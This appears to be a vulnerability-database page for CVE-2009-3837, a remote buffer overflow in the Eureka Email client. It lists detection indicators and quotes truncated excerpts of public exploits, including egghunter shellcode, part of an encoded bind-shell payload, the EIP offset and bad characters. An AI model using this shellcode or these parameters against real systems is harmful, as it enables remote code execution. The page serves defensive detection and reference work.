CVE-2009-3837
published 2009-11-02CVE-2009-3837: Stack-based buffer overflow in Eureka Email 2.2q allows remote POP3 servers to execute arbitrary code via a long error message.
PriorityP352critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
32.07%
98.1th percentile
Stack-based buffer overflow in Eureka Email 2.2q allows remote POP3 servers to execute arbitrary code via a long error message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eureka-email | eureka_email | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7
bytes↗
w00tw00t
- →Detect oversized POP3 ERR responses on port 110 exceeding 512 bytes, which trigger the wsprintfA stack buffer overflow in Eureka Mail.exe at offset 0x43bdf2. ↗
- →Look for the egghunter tag 'w00tw00t' in POP3 ERR response payloads on port 110 as a strong indicator of exploitation attempt. ↗
- →Flag POP3 ERR responses containing ~710+ bytes of padding followed by a return address, consistent with the known EIP overwrite offset of 714 bytes. ↗
- →Monitor for rogue POP3 servers (port 110) sending excessively long ERR messages; the exploit requires the victim to manually check mail (Ctrl-M) to trigger the vulnerable code path. ↗
- →Detect the PrependEncoder stack-adjustment stub bytes (\x81\xc4\xff\xef\xff\xff\x44) prepended to shellcode in POP3 ERR payloads. ↗
- →BadChars for this exploit are null byte, LF, CR, and space (\x00\x0a\x0d\x20); shellcode in ERR payloads will not contain these bytes, which can help tune detection signatures. ↗
- ·The exploit is described as unreliable and only triggers when the victim manually checks mail via Ctrl-M; automated startup mail checks do not reach the vulnerable code path, limiting exploitation window. ↗
- ·The EIP overwrite offset varies depending on the length of the attacker's LHOST IP address string, making the exact offset dynamic across different attacker IPs. ↗
- ·Return addresses (JMP ESP gadgets) are hardcoded per OS/SP version; the exploit targets Win XP SP2 and SP3 English only. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
exploitdb·2010-08-25
CVE-2009-3837 Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)
---
##
# $Id: eureka_mail_err.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',
# bof occurs due to wsprintfA @ 0x43bdf2 in "Eureka Mail.exe" v2.2.0.1
# overflows a buffer of 512 bytes, smashes a buffer of 256 bytes, then the return address
'Description' => %q{
This module exploits a buffer overflow in the Eureka Email 2.2q
client that is triggered through an excessively long ERR message.
NOTE: this
Exploit-DB
Eureka Email Client - Remote Buffer Overflow
exploitdb·2009-11-26
CVE-2009-3837 Eureka Email Client - Remote Buffer Overflow
Eureka Email Client - Remote Buffer Overflow
---
#!/usr/bin/env python
# Found By: Francis Provencher {PRL}
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
##########################################################
import sys, socket
# egghunter (32 bytes)
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # this is the egg: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=thread, LPORT=4444
bindshell = ("\xbb\xd3\x82\x28\x36\xd9\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x5e\x0f\x03\x5e\xdc\x60\xdd\xca\x0a\xed"
"\x1e
Exploit-DB
Eureka Email Client 2.2q - Buffer Overflow (PoC)
exploitdb·2009-10-23
CVE-2009-3837 Eureka Email Client 2.2q - Buffer Overflow (PoC)
Eureka Email Client 2.2q - Buffer Overflow (PoC)
---
#####################################################################################
Application: Eureka Mail client
Platforms: Windows XP Professional SP2
Exploitation: remote BoF
Date: 2009-10-06
Author: Francis Provencher (Protek Research Lab's)
Special Thanks to: M Jeremy Brown
#####################################################################################
1) Introduction
2) Technical details
3) The Code
#####################################################################################
1) Introduction
Sick of junk email? Bored of all email programs looking the same? Take a look at Eureka Email and see how different things could be...
Eureka Email has a built in junk email filter which can remove about 95% of y
Metasploit
Eureka Email 2.2q ERR Remote Buffer Overflow
metasploit
Eureka Email 2.2q ERR Remote Buffer Overflow
Eureka Email 2.2q ERR Remote Buffer Overflow
This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here.
No writeups or analysis indexed.
http://osvdb.org/59262http://secunia.com/advisories/37132http://www.packetstormsecurity.org/0910-exploits/eurekamc-dos.txthttp://www.securityfocus.com/archive/1/507376/100/0/threadedhttp://www.securityfocus.com/archive/1/508126/100/0/threadedhttp://www.vupen.com/english/advisories/2009/3025https://exchange.xforce.ibmcloud.com/vulnerabilities/53940http://osvdb.org/59262http://secunia.com/advisories/37132http://www.packetstormsecurity.org/0910-exploits/eurekamc-dos.txthttp://www.securityfocus.com/archive/1/507376/100/0/threadedhttp://www.securityfocus.com/archive/1/508126/100/0/threadedhttp://www.vupen.com/english/advisories/2009/3025https://exchange.xforce.ibmcloud.com/vulnerabilities/53940
2009-11-02
Published